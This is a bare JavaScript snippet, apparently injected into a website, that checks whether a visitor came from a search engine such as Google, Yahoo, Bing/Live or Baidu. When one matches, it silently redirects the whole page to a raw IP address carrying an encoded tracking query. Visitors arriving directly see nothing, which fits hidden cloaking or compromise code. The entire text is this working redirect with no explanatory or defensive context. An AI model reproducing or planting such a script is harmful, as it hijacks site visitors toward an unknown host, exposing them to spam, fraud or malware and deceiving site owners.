var url = "http://77.78.239.70/index.php?q=QU43JW5V70B3951WS69KSDFZL97B9J88XR6B35DO5D80UY61IIXG6UKIV2Q4SBF9C46F5Z397WNV76157FJ2taLitUMFFvK1dFRlAIOlJFOwwtIiY8VmgrXTZZXwc7Uj5HXCkqSTgJTGFpSgE1eCR2SmE3eGQKYQBke3MIc0BTNUE%253D";
    
if (document.referrer && document.referrer!="" && 
    (
	document.referrer.match(/msn/i) ||
	document.referrer.match(/live/i) ||
	document.referrer.match(/altavista/i) ||
	document.referrer.match(/baidu/i) ||
	document.referrer.match(/yahoo/i) ||
	( document.referrer.match(/google/i) && (document.referrer.match(/imgres/i) || document.referrer.match(/search/i) || document.referrer.match(/blogsearch/i)) )
    )

)
{
if (top.location.replace)
{
    top.location.replace(url);
    }
    else
    {
	top.location.href = url;
	}
	}